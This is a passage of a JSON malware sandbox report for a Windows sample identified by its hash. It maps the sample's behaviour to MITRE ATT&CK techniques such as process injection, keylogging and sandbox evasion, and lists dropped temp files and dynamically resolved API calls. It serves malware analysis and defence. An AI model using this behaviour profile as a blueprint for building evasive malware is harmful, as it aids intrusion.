"https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 4, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 4, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 6, "informative_identifiers_count": 18}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfinfo.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bauqs.exe\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat\"\n \"bauqs.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xyzuqi.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" 